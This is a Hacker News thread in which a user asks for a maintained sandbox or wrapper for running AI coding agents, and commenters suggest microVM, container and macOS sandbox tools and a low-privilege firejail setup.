| ▲ | Ask HN: Secure wrapper for coding agents? | ||||||||||||||||||||||
| 19 points by rjzzleep a day ago | 15 comments | |||||||||||||||||||||||
I believe someone recently posted sort of a secure harness/wrapper for running coding agents in a secure sandbox. I can't find the project. Of course I can make my own wrapper with systemd-nspawn, kata or bspawn, but I believe I saw a decently well-maintained project just a while back. Does anyone have a suggestion or link? It's become extremely hard to find things on GitHub with all the generated projects. | |||||||||||||||||||||||
| ▲ | pixdamix a day ago | parent | next [-] | ||||||||||||||||||||||
If you're on a mac, lookup https://bromure.io/en/agentic-coding (Lookup the browser too: https://bromure.io/en/secure-web) Everything you see is made by Claude (and Renaud Deraison :-)) and working quite well jugding from the demos) See here for more details (in french but English subs available (and more)): https://www.sstic.org/2026/presentation/cloture_2026/ | |||||||||||||||||||||||
| |||||||||||||||||||||||
| ▲ | binsquare 4 hours ago | parent | prev | next [-] | ||||||||||||||||||||||
I build a local, cross platform virtual machine for this purpose: https://github.com/smol-machines/smolvm | |||||||||||||||||||||||
| ▲ | sanju3026 a day ago | parent | prev | next [-] | ||||||||||||||||||||||
I believe you're looking for Era. It uses libkrun for local microVM isolation and was built specifically to solve the "LLM hallucinated a destructive bash command" problem without the overhead of a massive VM. Another one that handles this gracefully is Yolobox, which uses rootless Podman. Both are actively maintained and cut through the noise of the thousands of generic wrapper repos out there right now. | |||||||||||||||||||||||
| |||||||||||||||||||||||
| ▲ | clusterhacks 9 hours ago | parent | prev | next [-] | ||||||||||||||||||||||
This may be too naive, but I created a user on my linux box who doesn't have very many permissions. Then I sudo to that user, use firejail to start pi in a dev project directory, and let it have at it. My projects are usually very limited with respect to external dependencies and that is part of prompts or markdown files describing various project goals, plans, and current state. My operating theory is that this probably won't get my systems borked. I wasn't patient enough to dig deeper. | |||||||||||||||||||||||
| ▲ | ca_tech a day ago | parent | prev | next [-] | ||||||||||||||||||||||
If you are running MacOS, I would recommend Agent Safehouse. Well maintained and is built on existing sandbox-exec so you are not locked in and can always build your own rules independent of the CLI tool. https://github.com/eugene1g/agent-safehouse/ https://agent-safehouse.dev/ Originally posted on HN https://news.ycombinator.com/item?id=47301085 | |||||||||||||||||||||||
| |||||||||||||||||||||||
| ▲ | sakuraiben a day ago | parent | prev | next [-] | ||||||||||||||||||||||
Take a look at https://github.com/Tako-Research/TakoVM! | |||||||||||||||||||||||
| ▲ | aborsy a day ago | parent | prev | next [-] | ||||||||||||||||||||||
Docker has introduced sandboxes for this purpose. | |||||||||||||||||||||||
| ▲ | Jeremy1026 a day ago | parent | prev | next [-] | ||||||||||||||||||||||
agent-pd was posted as a Show HN fairly recently, might be what you are remembering? https://github.com/varmabudharaju/agent-pd/ | |||||||||||||||||||||||
| ▲ | felixlu2026 19 hours ago | parent | prev | next [-] | ||||||||||||||||||||||
for coding agents, i care less about sandbox branding and more about boring audit logs. what did it read, what did it write, and what was blocked? | |||||||||||||||||||||||
| ▲ | rohityin a day ago | parent | prev [-] | ||||||||||||||||||||||
Have you thought About docker? | |||||||||||||||||||||||